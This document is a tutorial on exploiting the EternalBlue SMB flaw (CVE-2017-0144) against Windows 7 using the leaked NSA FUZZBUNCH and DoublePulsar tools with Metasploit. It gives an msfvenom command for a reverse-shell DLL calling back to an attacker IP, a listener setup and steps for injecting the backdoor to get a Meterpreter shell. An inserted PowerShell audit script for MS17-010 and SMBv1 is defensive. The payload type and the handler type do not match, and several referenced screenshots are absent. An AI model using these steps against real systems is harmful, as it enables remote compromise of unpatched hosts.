Introduction
EternalBlue (CVE-2017-0144) is an exploit of a vulnerability in Microsoft’s Server Message Block (SMB) protocol; it is believed to have been developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group in April 2017 and was used as part of the worldwide WannaCry ransomware attack in May 2017.
Exploiting the EternalBlue vulnerability using the NSA’s leaked tools (FUZZBUNCH) and the Metasploit framework
On April 8, 2017, TheShadowBrokers published a set of tools stolen from the NSA’s arsenal of hacking tools. A GitHub repository with the leak is: https://github.com/misterch0c/shadowbroker.
FUZZBUNCH is the NSA’s exploit framework, comparable to Metasploit.
In this tutorial we will use FUZZBUNCH to check whether a target is vulnerable to EternalBlue, inject and execute a payload on the victim, and then use Metasploit’s Meterpreter to compromise the victim machine.
1. Setting up FUZZBUNCH
Requirements:
- Python 2.6: https://www.python.org/download/releases/2.6/
- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
- Target machine: Windows 7
- Attacker machine 1: Windows 7 with FUZZBUNCH
- Attacker machine 2: Kali Linux with the Metasploit framework
Download the NSA tools, move to the shadowbrokermaster/Windows folder, then open Fuzzbunch.xml and configure the “ResourcesDir” and “LogDir” entries as follows:
Comment out the following command in fb.py (line 72), because the leak contains no module named “ListeningPost”. If the line is left in, an error occurs when fb.py is executed.
# addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
2. Checking whether the target is vulnerable to EternalBlue
Execute fb.py by entering the command “python fb.py”.
Enter the target IP and the callback IP address (the attacker’s IP address).
We’ll keep the default configuration for every parameter, except for the following one, where we need to change the mode to “1”:
Finally, if the target is vulnerable to EternalBlue, we should see the message “Eternalblue Succeeded”.
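The check above tells an attacker whether the SMB service is exploitable; the defender’s counterpart is to confirm that the host carries the MS17-010 fix and that the SMBv1 server is switched off. The following PowerShell script is an added example, not part of the original tutorial or of the leaked toolkit; it assumes Windows 7 SP1 / Server 2008 R2, where MS17-010 shipped as KB4012212 (security-only) or KB4012215 (monthly rollup), and reads the LanmanServer SMB1 registry value that controls SMBv1 on that OS generation.

```powershell
# Added example, not from the original tutorial: audit a Windows host for the
# two controls that stop EternalBlue (CVE-2017-0144), the MS17-010 patch and
# a disabled SMBv1 server. KB ids assumed for Windows 7 SP1 / Server 2008 R2.

$Ms17010Kbs = @('KB4012212', 'KB4012215')   # security-only / monthly rollup
$LanmanKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Ms17010Patched {
    # Either KB proves the fix is present. A later cumulative rollup supersedes
    # both and hides them, so $false means "unproven", not "unpatched".
    foreach ($kb in $Ms17010Kbs) {
        if (Get-HotFix -Id $kb -ErrorAction SilentlyContinue) { return $true }
    }
    return $false
}

function Test-Smb1Disabled {
    # Windows 8 / Server 2012 and later expose the setting through the SMB module.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return -not (Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    # Windows 7 / 2008 R2: a DWORD SMB1 = 0 under LanmanServer disables SMBv1.
    # If the value is absent, SMBv1 is enabled by default.
    $smb1 = (Get-ItemProperty -Path $LanmanKey -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    return ($null -ne $smb1 -and $smb1 -eq 0)
}

$patched = Test-Ms17010Patched
$smb1Off = Test-Smb1Disabled
"MS17-010 patch found : $patched"
"SMBv1 server disabled: $smb1Off"

if (-not $patched -and -not $smb1Off) {
    Write-Warning 'SMBv1 is enabled and MS17-010 is not confirmed: EternalBlue exposure.'
    Write-Warning 'Install MS17-010, then disable SMBv1 (reboot required):'
    Write-Warning "Set-ItemProperty -Path '$LanmanKey' -Name SMB1 -Type DWORD -Value 0 -Force"
}
```

Run it in an elevated PowerShell session on the host being audited; on other Windows versions substitute that version’s MS17-010 KB ids.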
3. Generate payload with msfvenom
Generate the payload by entering the following command in a Kali terminal:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.28.140 -b "\x00" LPORT=4444 -f dll -o /root/eternalblue/backdoor.dll
4. Start the Metasploit exploit/multi/handler
On the attacker machine, type the following commands so that Metasploit handles the payload generated above.
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.28.140
set lport 4444
run
5. Send and execute the payload on the target using DoublePulsar from the NSA leaked tools
The next step is to run DoublePulsar and inject the malicious backdoor.dll file. Enter the command “use DoublePulsar” in FUZZBUNCH:
Configure the target IP address, port, protocol, OS architecture, path to the DLL backdoor file …
If the payload is sent to the victim successfully, the output should look like the following:
6. Compromise the target using a Meterpreter shell in Metasploit
With the backdoor already running on the target, when we switch back to Metasploit we should have received a Meterpreter shell: